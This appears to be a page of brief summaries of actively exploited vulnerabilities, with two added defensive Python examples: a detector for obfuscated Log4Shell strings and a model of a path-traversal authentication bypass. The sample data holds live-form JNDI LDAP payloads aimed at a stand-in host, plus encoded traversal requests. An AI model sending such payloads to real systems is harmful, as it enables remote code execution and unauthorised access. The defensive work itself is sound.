Technical deep-dives into Critical and High-severity CISA Known Exploited Vulnerabilities (CVSS 7.0+) — the confirmed active threats that matter most to defenders.
An out-of-bounds write vulnerability in PAN-OS's Captive Portal and User-ID service allows unauthenticated remote code execution as root on PA-Series and VM-Series firewalls.
An incorrect resource transfer between security domains in the Linux kernel allows a local unprivileged user to escalate to root privileges, affecting a broad range of distributions.
Authentication bypass in Cisco Catalyst SD-WAN Manager and Controller allows unauthenticated remote attackers to gain full administrative privileges without credentials.
A SQL injection vulnerability in BerriAI LiteLLM allows authenticated attackers to read and modify the proxy database, exposing stored API keys for OpenAI, Anthropic, and other LLM providers.
An authentication bypass vulnerability in cPanel & WHM's login flow grants unauthenticated attackers full control panel access, affecting millions of web hosting deployments worldwide.
A reflected cross-site scripting vulnerability in Exchange Server's Outlook Web Access (OWA) enables arbitrary JavaScript execution in victim browsers, facilitating session hijacking and credential theft under specific interaction conditions.
Improper input validation in Ivanti Endpoint Manager Mobile (EPMM) allows an authenticated administrator to execute arbitrary OS commands, leading to full server compromise.
A high-severity deserialization vulnerability in Microsoft SharePoint Server allows an authenticated attacker with Site Owner permissions to execute arbitrary code on the server, exploited in the wild for persistent access and network reconnaissance in targeted intrusion campaigns.
A high-severity use-after-free vulnerability in the Windows Common Log File System (CLFS) driver allows local attackers to escalate privileges to SYSTEM, actively exploited as a zero-day by ransomware operators before Microsoft's April 2025 Patch Tuesday.
A high-severity unrestricted file upload and download vulnerability in Cleo's Harmony, VLTrader, and LexiCom MFT products allows remote attackers to execute arbitrary commands, serving as the precursor exploit chain to the more critical CVE-2024-55956 zero-day exploitation campaign.
Ivanti Connect Secure / Policy Secure / Neurons for ZTA (CVSS 9.0): A critical stack-based buffer overflow in Ivanti Connect Secure, Policy Secure and ZTA gateways allows unauthenticated remote attackers to execute arbitrary code, exploited as a zero-day in targeted campaigns before Ivanti's January 2025 advisory, following the pattern of prior Ivanti VPN zero-day exploitation.
A critical unrestricted file upload vulnerability in Cleo's managed file transfer products (Harmony, VLTrader, LexiCom) allows unauthenticated attackers to upload and execute arbitrary code, exploited by the Clop ransomware group in a wave of targeted data theft attacks.
A critical information disclosure vulnerability in ownCloud's graphapi app exposes PHP environment variables including admin passwords, mail server credentials, and license keys to unauthenticated attackers via a publicly accessible URL.
A server-side request forgery vulnerability in Ivanti Connect Secure and Policy Secure's SAML component allows unauthenticated attackers to access restricted resources, exploited as part of a multi-CVE attack chain targeting government and enterprise VPN infrastructure.
A critical account takeover vulnerability in GitLab CE/EE allows unauthenticated attackers to send password reset emails to arbitrary email addresses, enabling complete account hijacking without user interaction, including of administrator accounts.
Atlassian Confluence Server / Data Center (CVSS 9.8): A critical OGNL injection vulnerability in Atlassian Confluence Server and Data Center allows unauthenticated attackers to execute arbitrary commands via crafted HTTP requests, exploited as a zero-day in targeted attacks before patch availability.
A critical SQL injection vulnerability in Ivanti Endpoint Manager's Core server allows unauthenticated attackers on the same network to execute arbitrary code via the DAS component, confirmed as actively exploited by CISA in September 2024.
A critical pre-authentication bypass in JetBrains TeamCity allows unauthenticated attackers to create admin tokens and gain full server control, exploited by APT29 and North Korean actors in supply chain intrusion campaigns targeting software development pipelines.
A high-severity pre-authentication remote code execution vulnerability in Fortra's GoAnywhere Managed File Transfer was exploited as a zero-day by the Cl0p ransomware group, compromising over 130 organisations before a patch was available.
A critical YAML deserialization vulnerability in IBM Aspera Faspex's API allows unauthenticated remote attackers to execute arbitrary code, exploited by ransomware groups within days of public disclosure via a pre-authentication attack path.
A critical argument injection vulnerability in PHP-CGI on Windows allows unauthenticated remote attackers to execute arbitrary PHP code: on affected system locales, Windows' Best-Fit character mapping converts a soft hyphen in the query string into the ordinary hyphen that PHP-CGI treats as a command-line option marker, so PHP's own check for hyphen-prefixed arguments is bypassed; XAMPP and other common Windows PHP deployments are affected.
A critical SQL injection vulnerability in Fortinet FortiClientEMS allows unauthenticated remote attackers to execute arbitrary commands via crafted requests to the management server, with active exploitation confirmed by multiple threat intelligence sources.
A critical format string vulnerability in Fortinet FortiOS, FortiProxy, FortiPAM, and FortiWeb's fgfmd daemon allows unauthenticated remote attackers to execute arbitrary commands via specially crafted requests to the FGFM protocol.
A critical zero-day privilege escalation in Cisco IOS XE's web UI feature allows unauthenticated remote attackers to create administrator-level accounts, exploited massively to implant a persistent backdoor on tens of thousands of Cisco network devices.
A critical authentication bypass in F5 BIG-IP's iControl REST API allows unauthenticated remote attackers with network access to the management interface to execute arbitrary system commands as root, massively exploited within days of disclosure.
A critical JNDI injection vulnerability in Apache Log4j 2 allows unauthenticated remote code execution by logging a specially crafted string, affecting an enormous portion of the Java application ecosystem and triggering one of the most urgent security responses in history.
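Because Log4j 2 resolves lookups such as `${lower:j}`, `${upper:n}` and `${env:UNSET:-d}` before the final string is logged, attackers obfuscated the `${jndi:...}` trigger to slip past naive signature matching. The detector below, an added example that is not code from the page or from the Log4j project, folds those lookups the way Log4j would (for detection purposes only; `env`, `sys` and `jndi` are never evaluated, only their `:-` defaults) and then matches the resolved string. The log lines and IP addresses are constructed for the example.

```python
"""Detect obfuscated Log4Shell-style JNDI lookup strings in log lines (added example)."""
import re

# Innermost ${...} lookup: body contains no '$', '{' or '}', so nested lookups
# are resolved inside-out across repeated passes.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The trigger that matters once obfuscation is folded away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Resolve one non-nested lookup body.

    Returns the replacement text, or None when the lookup cannot be resolved
    offline (jndi:, unknown prefixes) and has no ':-' default, in which case
    the literal lookup is kept for the final match.
    """
    var, default = body, None
    i = body.find(":-")              # Log4j's default-value delimiter
    if i != -1:
        var, default = body[:i], body[i + 2:]
    if var.startswith("lower:"):
        return var[len("lower:"):].lower()
    if var.startswith("upper:"):
        return var[len("upper:"):].upper()
    m = re.fullmatch(r"date:'([^']*)'", var)   # ${date:'j'} is the literal j
    if m:
        return m.group(1)
    # env:, sys:, ctx:, jndi:, empty name, etc.: unresolvable here; attackers
    # rely on the ':-' default being substituted, so return exactly that.
    return default


def deobfuscate(s: str, max_rounds: int = 20) -> str:
    """Fold nested lookups inside-out until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)       # keep unresolved lookup verbatim
            changed = True
            return r

        s = _INNER.sub(sub, s)
        if not changed:
            break
    return s


def is_jndi_probe(line: str) -> bool:
    """True when the line, after folding lookups, contains a ${jndi: trigger."""
    return _JNDI.search(deobfuscate(line)) is not None


def scan(lines):
    """Return (index, resolved_line) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        resolved = deobfuscate(line)
        if _JNDI.search(resolved):
            hits.append((i, resolved))
    return hits


# Constructed sample access-log lines (not real traffic).
LOGS = [
    '10.0.0.5 - - [10/Dec/2021:13:37:00 +0000] "GET /login HTTP/1.1" 200 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:13:38:12 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:LDAP}://198.51.100.7/b}"',
    '10.0.0.7 - - [10/Dec/2021:13:39:40 +0000] "GET /health HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [10/Dec/2021:13:40:01 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for idx, resolved in scan(LOGS):
        print(f"line {idx}: {resolved}")
```

The fourth sample line carries a benign `${date:yyyy}` lookup and is not flagged, which is the point of folding lookups rather than alerting on every `${`: the decision is made on what Log4j would actually have seen.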
A signal handler race condition in OpenSSH's sshd allows unauthenticated remote code execution as root on glibc-based Linux systems, a regression of a 2006 vulnerability reintroduced in OpenSSH 8.5p1.
A critical SQL injection vulnerability in Progress Software MOVEit Transfer allows unauthenticated attackers to escalate privileges and achieve remote code execution, exploited at massive scale by the Cl0p ransomware group in a wave of data theft affecting thousands of organisations.
A critical information disclosure vulnerability in Citrix NetScaler ADC and Gateway allows unauthenticated attackers to retrieve session tokens from device memory, enabling session hijacking without requiring any credentials.
A critical heap-based buffer overflow in Fortinet FortiOS and FortiProxy SSL-VPN allows pre-authentication remote attackers to execute arbitrary code, actively exploited by multiple threat actors including ransomware groups and nation-state APTs.
Atlassian Confluence Data Center and Server (CVSS 10.0): A critical privilege escalation vulnerability in Atlassian Confluence Data Center and Server allows unauthenticated attackers to create administrator accounts by accessing a restricted endpoint, exploited as a zero-day in targeted attacks.
A critical out-of-bounds write vulnerability in Fortinet FortiOS SSL VPN allows unauthenticated remote attackers to achieve arbitrary code execution via specially crafted HTTP requests, with active exploitation observed in CISA KEV.
An authentication bypass vulnerability in Ivanti Connect Secure and Policy Secure allows remote attackers to circumvent authentication controls via crafted URL path traversal, typically chained with CVE-2024-21887 for unauthenticated RCE.
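The bug class behind this kind of bypass is an allow-list of unauthenticated paths that is matched against the request path as received, while the component that finally serves the request collapses `..` segments and percent-encoding. The model below is an added example, not Ivanti's code and not a description of the affected product's internals: the endpoint names in `PUBLIC_PREFIXES` and the sample requests are hypothetical, and the point is the difference between checking the raw path and checking the canonical one.

```python
"""Path-traversal authentication bypass: raw-path allow-list vs canonical check (added example)."""
import posixpath
from urllib.parse import unquote

# Hypothetical endpoints a gateway serves without a session (assumption for the example).
PUBLIC_PREFIXES = ("/api/v1/public/", "/login", "/static/")


def canonical(raw_path: str) -> str:
    """Canonicalise a request path the way a backend handler would before routing.

    Decodes twice (so %252e%252e becomes ..), collapses duplicate leading slashes,
    and resolves '.' and '..' segments; '..' above the root is dropped by normpath.
    """
    p = unquote(unquote(raw_path))
    p = "/" + p.lstrip("/")
    return posixpath.normpath(p)


def vulnerable_is_public(raw_path: str) -> bool:
    """Vulnerable: prefix match on the path exactly as the client sent it.

    '/api/v1/public/../admin/users' starts with an allowed prefix, so it is
    waved through, but the backend will serve '/api/v1/admin/users'.
    """
    return raw_path.startswith(PUBLIC_PREFIXES)


def hardened_is_public(raw_path: str) -> bool:
    """Hardened: canonicalise first, then match whole path segments."""
    c = canonical(raw_path)
    return any(c == pre.rstrip("/") or c.startswith(pre) for pre in PUBLIC_PREFIXES)


def decide(checker, raw_path: str, authenticated: bool = False) -> str:
    """Simulated gateway decision: '200 <served path>' or '401'."""
    if authenticated or checker(raw_path):
        return "200 " + canonical(raw_path)
    return "401"


# Constructed requests (not from any real capture).
REQUESTS = [
    "/login",
    "/api/v1/public/status",
    "/api/v1/admin/users",
    "/api/v1/public/../admin/users",
    "/api/v1/public/%2e%2e/admin/users",
    "/api/v1/public/%252e%252e/admin/users",
]

if __name__ == "__main__":
    for r in REQUESTS:
        print(f"{r:45} raw-check: {decide(vulnerable_is_public, r):30} "
              f"canonical-check: {decide(hardened_is_public, r)}")
```

The three traversal variants all reach `/api/v1/admin/users` through the raw-path check and are all rejected once the allow-list is applied to the canonical path; the same canonicalisation must be the one the serving code uses, otherwise the two components still disagree about what the request is.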
A critical authentication bypass in ConnectWise ScreenConnect's setup wizard endpoint allows unauthenticated attackers to create new administrator accounts, immediately followed by RCE via the companion path traversal vulnerability CVE-2024-1708.
A critical authentication bypass in JetBrains TeamCity's web server allows unauthenticated attackers to gain administrative control and achieve remote code execution, leading to widespread supply chain compromise campaigns.
A critical command injection vulnerability in Palo Alto Networks PAN-OS GlobalProtect gateway allows unauthenticated remote attackers to execute arbitrary commands as root, actively exploited as a zero-day before patch availability.
A command injection vulnerability in Ivanti Connect Secure and Policy Secure allows authenticated administrators to execute arbitrary commands, chained with CVE-2023-46805 for zero-click unauthenticated RCE in the wild.